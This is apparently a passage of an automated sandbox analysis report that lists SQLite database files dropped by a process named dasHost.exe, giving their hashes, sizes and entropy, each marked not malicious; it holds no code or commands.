                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
